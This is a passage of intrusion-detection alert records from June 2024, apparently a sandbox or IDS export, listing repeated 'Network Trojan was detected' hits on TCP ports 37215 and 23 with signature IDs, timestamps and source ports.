                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940345
                SID:2835222
                Source Port:44376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501235
                SID:2835222
                Source Port:46240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934197
                SID:2829579
                Source Port:55658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151382
                SID:2829579
                Source Port:33306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012810
                SID:2829579
                Source Port:59698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942063
                SID:2835222
                Source Port:59712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198697
                SID:2829579
                Source Port:38822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505319
                SID:2829579
                Source Port:53156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031791
                SID:2829579
                Source Port:55180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667466
                SID:2835222
                Source Port:53024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518667
                SID:2835222
                Source Port:58452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760173
                SID:2829579
                Source Port:35728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183160
                SID:2829579
                Source Port:55388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503790
                SID:2835222
                Source Port:57166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989797
                SID:2835222
                Source Port:34794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181429
                SID:2829579
                Source Port:50644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057690
                SID:2835222
                Source Port:33224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614218
                SID:2835222
                Source Port:57396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111723
                SID:2835222
                Source Port:35520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366756
                SID:2829579
                Source Port:53558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703808
                SID:2829579
                Source Port:41946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661416
                SID:2835222
                Source Port:60186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322082
                SID:2835222
                Source Port:46028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987423
                SID:2835222
                Source Port:33240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150798
                SID:2829579
                Source Port:42384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546368
                SID:2835222
                Source Port:39444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228110
                SID:2829579
                Source Port:38776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776040
                SID:2835222
                Source Port:58496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704765
                SID:2835222
                Source Port:42692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450142
                SID:2829579
                Source Port:53934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914028
                SID:2829579
                Source Port:57444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001211
                SID:2829579
                Source Port:33612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164361
                SID:2829579
                Source Port:42658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013072
                SID:2835222
                Source Port:57860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788911
                SID:2829579
                Source Port:43442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716030
                SID:2835222
                Source Port:53294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812638
                SID:2835222
                Source Port:35264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986178
                SID:2829579
                Source Port:54308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715987
                SID:2829579
                Source Port:34100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775566
                SID:2829579
                Source Port:45978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779005
                SID:2829579
                Source Port:60034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792061
                SID:2829579
                Source Port:48558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150886
                SID:2835222
                Source Port:36072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342565
                SID:2835222
                Source Port:59926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472393
                SID:2829579
                Source Port:55716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186531
                SID:2835222
                Source Port:35968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471678
                SID:2835222
                Source Port:47030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.521709
                SID:2835222
                Source Port:50670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027981
                SID:2835222
                Source Port:40294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.015119
                SID:2835222
                Source Port:40118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763758
                SID:2829579
                Source Port:56494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804073
                SID:2829579
                Source Port:34906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182577
                SID:2835222
                Source Port:42724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546973
                SID:2829579
                Source Port:49142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472806
                SID:2829579
                Source Port:43118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072626
                SID:2835222
                Source Port:55630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182685
                SID:2835222
                Source Port:33958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200929
                SID:2835222
                Source Port:59710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704643
                SID:2835222
                Source Port:44384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183164
                SID:2829579
                Source Port:42136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735273
                SID:2829579
                Source Port:50998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700555
                SID:2835222
                Source Port:52712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451373
                SID:2835222
                Source Port:53874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.918004
                SID:2835222
                Source Port:49282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777292
                SID:2835222
                Source Port:45056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989889
                SID:2835222
                Source Port:42168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034827
                SID:2829579
                Source Port:53376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549564
                SID:2829579
                Source Port:34004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019276
                SID:2829579
                Source Port:43542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072660
                SID:2829579
                Source Port:59550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051920
                SID:2829579
                Source Port:48362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016364
                SID:2829579
                Source Port:33714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761159
                SID:2835222
                Source Port:57662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073715
                SID:2829579
                Source Port:33918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275721
                SID:2835222
                Source Port:41768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201164
                SID:2829579
                Source Port:58346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132885
                SID:2835222
                Source Port:32892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967577
                SID:2829579
                Source Port:44824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200187
                SID:2835222
                Source Port:48810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569568
                SID:2829579
                Source Port:59866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134003
                SID:2829579
                Source Port:45054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670787
                SID:2829579
                Source Port:39420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517513
                SID:2835222
                Source Port:34846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198962
                SID:2829579
                Source Port:38878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292847
                SID:2835222
                Source Port:51884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411350
                SID:2835222
                Source Port:42910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689585
                SID:2835222
                Source Port:37920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382493
                SID:2829579
                Source Port:38950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715014
                SID:2829579
                Source Port:41118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290348
                SID:2835222
                Source Port:35246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791107
                SID:2829579
                Source Port:34928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.562889
                SID:2829579
                Source Port:44840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733563
                SID:2829579
                Source Port:51408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668844
                SID:2835222
                Source Port:50838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917274
                SID:2835222
                Source Port:40432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617492
                SID:2829579
                Source Port:39290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325888
                SID:2835222
                Source Port:57238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045626
                SID:2835222
                Source Port:34434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451681
                SID:2829579
                Source Port:56482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030036
                SID:2829579
                Source Port:50956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.689188
                SID:2840515
                Source Port:51024
                Destination Port:23
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805996
                SID:2835222
                Source Port:37474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134392
                SID:2835222
                Source Port:43766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451006
                SID:2829579
                Source Port:55050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916971
                SID:2829579
                Source Port:48280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227062
                SID:2835222
                Source Port:59484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226953
                SID:2835222
                Source Port:40212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422357
                SID:2835222
                Source Port:38514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011372
                SID:2835222
                Source Port:39670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850794
                SID:2835222
                Source Port:42518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410567
                SID:2835222
                Source Port:46720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968141
                SID:2835222
                Source Port:38350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915601
                SID:2829579
                Source Port:50572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733245
                SID:2835222
                Source Port:52138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115361
                SID:2835222
                Source Port:60496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014389
                SID:2829579
                Source Port:39008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978701
                SID:2835222
                Source Port:41926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966912
                SID:2835222
                Source Port:59506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.078299
                SID:2835222
                Source Port:44278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683847
                SID:2829579
                Source Port:38540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670170
                SID:2829579
                Source Port:44620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383880
                SID:2829579
                Source Port:37528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998161
                SID:2835222
                Source Port:53356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971883
                SID:2835222
                Source Port:60444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471629
                SID:2829579
                Source Port:35582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083970
                SID:2829579
                Source Port:44076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614483
                SID:2829579
                Source Port:42504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676782
                SID:2835222
                Source Port:33424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717324
                SID:2835222
                Source Port:50072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699504
                SID:2829579
                Source Port:35748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224955
                SID:2835222
                Source Port:43266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.704066
                SID:2840515
                Source Port:38722
                Destination Port:23
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243620
                SID:2835222
                Source Port:59708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736392
                SID:2829579
                Source Port:49224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699956
                SID:2835222
                Source Port:58256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545076
                SID:2829579
                Source Port:44862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165011
                SID:2835222
                Source Port:53624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846024
                SID:2835222
                Source Port:42258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161335
                SID:2829579
                Source Port:45998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023297
                SID:2829579
                Source Port:44342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051231
                SID:2829579
                Source Port:47856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668476
                SID:2835222
                Source Port:47100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423481
                SID:2829579
                Source Port:37084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967714
                SID:2829579
                Source Port:40216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.714764
                SID:2829579
                Source Port:55652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776203
                SID:2835222
                Source Port:47804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023501
                SID:2829579
                Source Port:39418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149900
                SID:2829579
                Source Port:38226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411427
                SID:2829579
                Source Port:35816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021930
                SID:2835222
                Source Port:42318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790436
                SID:2835222
                Source Port:51742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293237
                SID:2829579
                Source Port:36064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672196
                SID:2829579
                Source Port:60902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678726
                SID:2835222
                Source Port:37556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792509
                SID:2835222
                Source Port:35426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543503
                SID:2829579
                Source Port:59172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763326
                SID:2835222
                Source Port:57784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848887
                SID:2835222
                Source Port:39048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547503
                SID:2829579
                Source Port:34936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133616
                SID:2829579
                Source Port:55306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543141
                SID:2829579
                Source Port:51778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991547
                SID:2829579
                Source Port:42484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177043
                SID:2835222
                Source Port:42714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729521
                SID:2829579
                Source Port:56950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150862
                SID:2835222
                Source Port:55712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505047
                SID:2829579
                Source Port:59980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980692
                SID:2835222
                Source Port:52878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969340
                SID:2835222
                Source Port:46076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617380
                SID:2829579
                Source Port:56098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759566
                SID:2829579
                Source Port:37682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384245
                SID:2835222
                Source Port:54540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274402
                SID:2829579
                Source Port:35370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502596
                SID:2835222
                Source Port:33574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968103
                SID:2835222
                Source Port:41224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384498
                SID:2835222
                Source Port:60826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850205
                SID:2829579
                Source Port:49252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342502
                SID:2835222
                Source Port:32914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667567
                SID:2829579
                Source Port:40290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001245
                SID:2829579
                Source Port:33146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545999
                SID:2835222
                Source Port:41246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914737
                SID:2829579
                Source Port:59892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790265
                SID:2829579
                Source Port:38506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518910
                SID:2835222
                Source Port:47844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917528
                SID:2835222
                Source Port:41356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029009
                SID:2829579
                Source Port:37604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545445
                SID:2835222
                Source Port:39464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775502
                SID:2829579
                Source Port:51288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914374
                SID:2835222
                Source Port:37544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943438
                SID:2835222
                Source Port:45828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025523
                SID:2829579
                Source Port:38256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502824
                SID:2829579
                Source Port:33402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725366
                SID:2829579
                Source Port:35072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451942
                SID:2829579
                Source Port:57670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519277
                SID:2835222
                Source Port:36772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024623
                SID:2835222
                Source Port:36030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000023
                SID:2829579
                Source Port:53154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881036
                SID:2829579
                Source Port:51254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
